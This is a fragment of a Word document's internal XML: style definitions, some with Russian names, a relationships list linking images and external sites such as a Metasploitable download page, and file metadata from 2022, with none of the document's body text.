  <w:style w:type="character" w:customStyle="1" w:styleId="nt">
    <w:name w:val="nt"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00EF49CB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nx">
    <w:name w:val="nx"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00EF49CB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="p">
    <w:name w:val="p"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00EF49CB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="k">
    <w:name w:val="k"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00EF49CB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="o">
    <w:name w:val="o"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00EF49CB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="kd">
    <w:name w:val="kd"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00EF49CB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s1">
    <w:name w:val="s1"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00EF49CB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="kc">
    <w:name w:val="kc"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00EF49CB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="na">
    <w:name w:val="na"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00EF49CB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s">
    <w:name w:val="s"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00EF49CB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="err">
    <w:name w:val="err"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00EF49CB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-c1">
    <w:name w:val="pl-c1"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00EF49CB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-k">
    <w:name w:val="pl-k"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00EF49CB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="iw">
    <w:name w:val="iw"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00EF49CB"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aff1">
    <w:name w:val="caption"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00E11CC9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2BC3"/>
    <w:rPr>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="10"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00DC35BD"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines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C35BD"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:ind w:firstLine="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link w:val="30"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00DC35BD"/>
    <w:pPr>
      <w:ind w:firstLine="0"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="27"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="40"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00474D3C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nhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00474D3C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nhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00474D3C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4D3C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4D3C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4D3C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3"/>
    <w:next w:val="a"/>
    <w:link w:val="a4"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00985485"/>
    <w:pPr>
      <w:spacing w:after="300"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b w:val="0"/>
      <w:spacing w:val="5"/>
      <w:kern w:val="28"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="Заголовок 1 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="007E677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DC35BD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08377C"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28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474D3C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474D3C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474D3C"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="243F60" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="28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474D3C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474D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474D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5">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00474D3C"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="a6">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00474D3C"/>
    <w:pPr>
      <w:spacing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4D3C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474D3C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474D3C"/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="aa">
    <w:name w:val="page number"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00474D3C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ab">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="ac"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00474D3C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474D3C"/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ad">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00474D3C"/>
    <w:pPr>
      <w:spacing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qFormat/>
    <w:rsid w:val="0050513A"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="284"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9339"/>
      </w:tabs>
      <w:ind w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:szCs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50513A"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="851"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9339"/>
      </w:tabs>
      <w:spacing w:after="100"/>
      <w:ind w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ae">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="af"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00474D3C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474D3C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882CDA"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="567"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9339"/>
      </w:tabs>
      <w:ind w:firstLine="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af0">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FD541B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character" w:styleId="af1">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005A18F8"/>
    <w:rPr>
      <w:color w:val="800080" w:themeColor="followed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50513A"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="840"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003C260C"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af2">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00982907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982907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982907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982907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982907"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a4">
    <w:name w:val="Название Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a3"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="00985485"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:bCs/>
      <w:spacing w:val="5"/>
      <w:kern w:val="28"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="52"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af7">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="af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9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03" w:type="dxa"/>
        <w:right w:w="115" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="afc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Default">
    <w:name w:val="Default"/>
    <w:rsid w:val="00EF49CB"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af8">
    <w:name w:val="Подзаголовок Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af7"/>
    <w:rsid w:val="00EF49CB"/>
    <w:rPr>
      <w:rFonts w:ascii="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia" w:cs="Georgia"/>
      <w:i/>
      <w:color w:val="666666"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="51">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00EF49CB"/>
    <w:pPr>
      <w:spacing w:line="276" w:lineRule="auto"/>
      <w:ind w:left="880" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibr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EF49CB"/>
    <w:pPr>
      <w:spacing w:line="276" w:lineRule="auto"/>
      <w:ind w:left="1100" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibr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EF49CB"/>
    <w:pPr>
      <w:spacing w:line="276" w:lineRule="auto"/>
      <w:ind w:left="1320" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibr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EF49CB"/>
    <w:pPr>
      <w:spacing w:line="276" w:lineRule="auto"/>
      <w:ind w:left="1540" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibr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EF49CB"/>
    <w:pPr>
      <w:spacing w:line="276" w:lineRule="auto"/>
      <w:ind w:left="1760" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="aff">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00EF49CB"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00EF49CB"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="aff0">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00EF49CB"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML0">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="HTML1"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00EF49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EF49CB"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nt">
    <w:name w:val="nt"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00EF49CB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nx">
    <w:name w:val="nx"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00EF49CB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="p">
    <w:name w:val="p"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00EF49CB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="k">
    <w:name w:val="k"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00EF49CB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="o">
    <w:name w:val="o"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00EF49CB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="kd">
    <w:name w:val="kd"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00EF49CB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s1">
    <w:name w:val="s1"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00EF49CB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="kc">
    <w:name w:val="kc"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00EF49CB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="na">
    <w:name w:val="na"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00EF49CB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s">
    <w:name w:val="s"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00EF49CB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="err">
    <w:name w:val="err"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00EF49CB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-c1">
    <w:name w:val="pl-c1"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00EF49CB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-k">
    <w:name w:val="pl-k"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00EF49CB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="iw">
    <w:name w:val="iw"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00EF49CB"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aff1">
    <w:name w:val="caption"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00E11CC9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988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4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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image157.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://namechk.com/" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image94.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lubuntu.ru/app.php/download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microsoft.com/office/2007/relationships/stylesWithEffects" Target="stylesWithEffect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8.png"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://information.rapid7.com/download-metasploitable-2017-thanks.html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77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72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image159.png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webSettings" Target="web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numbering" Target="numbering.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.monitis.com/traceroute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theme" Target="theme/theme1.xml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13Vyf7anJiOqI2lpY0pYB10Lhg==">AMUW2mW/WsOISfphyVhCUJYbmyAV+YoI8imKf6kXz3/4/YfePqH7NYrX7P+7QXPamGvVnOQL5jlxN6tvCLTTwsZzeDLQBQtfuOaTc9UUTZiddbV/7UB8BL4jwHifxBG+j/hRRnHHMLvQabuc/bT2EZ1NRNt0TWQxVXW9Q9mow9yjoRqC4DMq73mpPzVMkyw+I6tueX+y5kBaE03+0WrUnn5yh3LAccMCMMZj1skVFY9QZ/Ahe00uMLW2gJCHyx+R7rN2/2Tzxtc3ycWmn6oA146hms6s+KMIbTEH9impexz444tiaRta9pbS19fTSUWvRVKqU9qeKZIB+jGmHe8+au7sukZbfC1gXYNjHgMILuR3jdW79XcSsWUskVbeUKr+ok9o6RwisDVOGp4bEUBFJrG6mrF21RTcBcVOfb6EETnn7GACku95qmskiO9hCQSflvPQpPXqgcpFUlEwYcnXmg77QLcTo/mizD7ZdT3n63wEFli6zHNNXrT+obbUhaGZSj2RC09eNGhtvrvZWgxT1SA0D/pNgi62ktESzBmvBSOe5juh/O8Ig6vVtYyIbvAQA+7qZXjdqDTSvGMmWaOpzLGCBoaqWsI39y9z9S9aY9mqjoAEm/lUN6HHuTBk5AMelRSCyuHkEnrvBHS8RCs7jOcS07I5Id50D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BA342A2-D706-47AD-8244-8B32BCC94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74</Pages>
  <Words>4154</Words>
  <Characters>23680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AicShy</dc:creator>
  <cp:lastModifiedBy>Aic Shy</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-06-30T17:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-30T17:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>